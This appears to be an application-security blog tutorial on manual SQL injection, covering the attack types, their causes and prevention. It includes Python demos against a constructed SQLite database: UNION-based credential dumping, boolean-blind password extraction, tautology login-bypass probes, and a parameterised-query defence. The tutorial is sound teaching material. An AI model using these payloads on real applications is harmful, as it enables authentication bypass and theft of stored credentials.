Dumping database using sql injection

Posted: November 7, 2012 in Application Security

I gave an overview of SQL injection (SQLi) in my previous post. As mentioned there, SQLi can be carried out in two ways:

  •  Manually
  •  With automated tools

Here we are going to discuss the Manual method of injection.

Manual SQL injection means pen-testing the application by hand: the tester (or attacker) interacts with the application directly, injects crafted strings into its inputs, and uses the responses to dig out sensitive data such as usernames, password hashes or SSNs, without relying on any tool to build the payloads.

Things required for manual injection:

  •  A site vulnerable to SQLi
  •  Burp Suite (to observe requests and responses)
  •  Patience
  •  A bit of knowledge of SQL and of the database the application uses
  •  And a brain :D

(The SQL injection cheat sheets on Pentest Monkey are a handy reference for database-specific syntax.)

Learning Objectives:

After going through this post you will understand:

  •  The various types of SQL injection attacks
  •  The causes of SQLi
  •  Design strategies for avoiding SQLi
  •  How to exploit SQLi

Types:

In general they are broadly categorised into three:

1) In-band
2) Out-of-band
3) Blind SQLi

In-band: The injection and the retrieval of results use the same channel, i.e. the injected query's output comes back in the ordinary HTTP response. This is the most straightforward case and has two common flavours: error-based, where the database error message shown by the application leaks data or structure, and UNION-based, where an appended SELECT returns its rows alongside the legitimate result.

Out-of-band: The results do not come back in the application's response at all. The attacker enters data through the normal input, but the data is retrieved through a second channel, for example a DNS lookup or HTTP request made by the database server, or an e-mail sent by the application.

Blind SQL injection: The application neither shows an error nor returns the injected data. Instead the attacker asks the database true/false questions and infers the answer from how the application responds: a different page for true and false (boolean-based), or a deliberate delay for true (time-based). Data is then extracted one bit or one character at a time.
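To make the in-band and blind cases concrete, here is an added example that is not part of the original post. It builds a constructed SQLite database with a users table and a products table behind a hypothetical product-search box whose input is concatenated straight into the query (deliberately vulnerable). It then shows error-based and UNION-based in-band extraction, and boolean-blind extraction of a password one character at a time using only the "found / not found" signal. Table names, column names and credentials are all invented for the demo.

```python
import sqlite3

# Constructed sample database for the demo (not from the original post).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(1, "laptop", 999.0), (2, "mouse", 19.0)])
    return conn

CONN = build_db()

def vulnerable_search(name):
    """Deliberately vulnerable: the search term is pasted into the SQL text."""
    sql = "SELECT name, price FROM products WHERE name = '" + name + "'"
    return CONN.execute(sql).fetchall()

# In-band, error-based: a lone quote breaks the string literal and the
# database error reaches the caller, which confirms the injection point.
def error_probe():
    try:
        vulnerable_search("'")
    except sqlite3.OperationalError as e:
        return str(e)
    return None

# In-band, UNION-based: the injected SELECT's rows ride back on the same
# response channel as the legitimate product rows. The trailing "--"
# comments out the closing quote the application appends.
def union_dump_users():
    payload = "x' UNION SELECT username, password FROM users--"
    return sorted(vulnerable_search(payload))

# Blind scenario: the only thing the application reveals is whether the
# search matched anything, never the data itself.
def product_exists(name):
    return len(vulnerable_search(name)) > 0

def blind_extract_password(username, max_len=16):
    """Boolean-blind extraction: for each position, ask 'is character N of
    the password equal to X?' and read the answer from found/not found."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    recovered = ""
    for pos in range(1, max_len + 1):
        matched = False
        for ch in alphabet:
            # 'laptop' is a known-good product, so the row comes back only
            # when the injected subquery condition is true.
            payload = (f"laptop' AND (SELECT substr(password,{pos},1) "
                       f"FROM users WHERE username='{username}')='{ch}")
            if product_exists(payload):
                recovered += ch
                matched = True
                break
        if not matched:
            # substr past the end returns '' and matches nothing: we are done.
            break
    return recovered

if __name__ == "__main__":
    print("error-based:", error_probe())
    print("union-based:", union_dump_users())
    print("blind:", blind_extract_password("alice"))
```

The blind routine issues up to 36 requests per character; in a real engagement you would binary-search on `unicode(substr(...))` (or the database's equivalent) to cut that to about six requests per character, and use a time-based condition where the page gives no boolean signal at all.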

Causes for SQL Injection:

There can be many causes for a vulnerability of this kind in an application, for example:

  •  Improper coding
  •  The developer not being aware of the vulnerability class
  •  Improper input validation
  •  Improper filtering or escaping of special characters (above all the single quote)
  •  Inserting values taken from a web form directly into the SQL query string

Avoiding SQLI:

  •  Using prepared (parameterised) statements is the best solution. The query's structure is sent to the database separately from the values, which are bound as data, so a quote or keyword in user input can never change the meaning of the query.
  •  Doing proper validation of every input
  •  Escaping suspicious strings or characters, using the database driver's own escaping routine rather than a hand-written one
  •  Using filters or white lists (allowing only the characters a field legitimately needs)

Exploiting the Vulnerability:

In order to exploit the vulnerability, first we need to confirm that the application is vulnerable to SQL injection. We can test this in many ways by sending logical strings to the application such as ', ' or '1'='1, ' or 1=1--, ' or 'a'='a, etc. A single quote that produces a database error, or a tautology that suddenly returns every row, tells us that the input reaches the query unescaped.
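The following added example (not code from the original post) ties together the prevention advice above and this detection step. It runs the probe strings from this section through a constructed SQLite login check written in the vulnerable style (values concatenated into the query), then through the same check rewritten as a prepared statement, and adds an allow-list validator as defence in depth. The `users` table, the credentials and the username pattern are all invented for the demo.

```python
import re
import sqlite3

# Constructed sample data for the demo (not from the original post).
CONN = sqlite3.connect(":memory:")
CONN.execute("CREATE TABLE users (username TEXT, password TEXT)")
CONN.executemany("INSERT INTO users VALUES (?, ?)",
                 [("alice", "s3cret"), ("bob", "hunter2")])

# The detection strings from the post, sent in the password field.
PROBES = ["'", "' or '1'='1", "' or 1=1--", "' or 'a'='a"]

def vulnerable_login(username, password):
    """Deliberately vulnerable: form values pasted into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return [row[0] for row in CONN.execute(sql).fetchall()]

def safe_login(username, password):
    """Prepared statement: the query shape is fixed and the ? placeholders
    are bound as data, so a quote in the input cannot end the literal."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in CONN.execute(sql, (username, password)).fetchall()]

# Allow-list validation (hypothetical policy): lowercase letters, digits
# and underscore, 1 to 32 characters. Anything else is rejected up front.
USERNAME_RE = re.compile(r"^[a-z0-9_]{1,32}$")

def validate_username(username):
    return bool(USERNAME_RE.match(username))

def probe(login):
    """Send each probe as the password and record what the application
    would observe: a database error, or the number of rows returned."""
    results = {}
    for p in PROBES:
        try:
            results[p] = len(login("admin", p))
        except sqlite3.OperationalError:
            results[p] = "error"
    return results

if __name__ == "__main__":
    # Vulnerable: the lone quote errors, the tautologies log in as everyone.
    print("vulnerable:", probe(vulnerable_login))
    # Prepared statement: no error and no rows, the probes are just bad passwords.
    print("safe:      ", probe(safe_login))
    print("validate:  ", validate_username("alice"), validate_username("' or 1=1--"))
```

The diagnostic pattern in `probe` is exactly what you do by hand in Burp: compare the response to a quote, to a tautology and to a benign value. Note that the tautology probes return rows for the vulnerable function with no valid credentials at all, which is the authentication bypass, while the parameterised version treats the whole probe as a literal password and matches nothing.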

I have written an article on exploiting and extracting the complete contents of a database using all three types (in-band, out-of-band and blind). You can find it here: Dumping database using SQL Injection.

Also have a look at the Web Application Security course offered by InfosecInstitute.
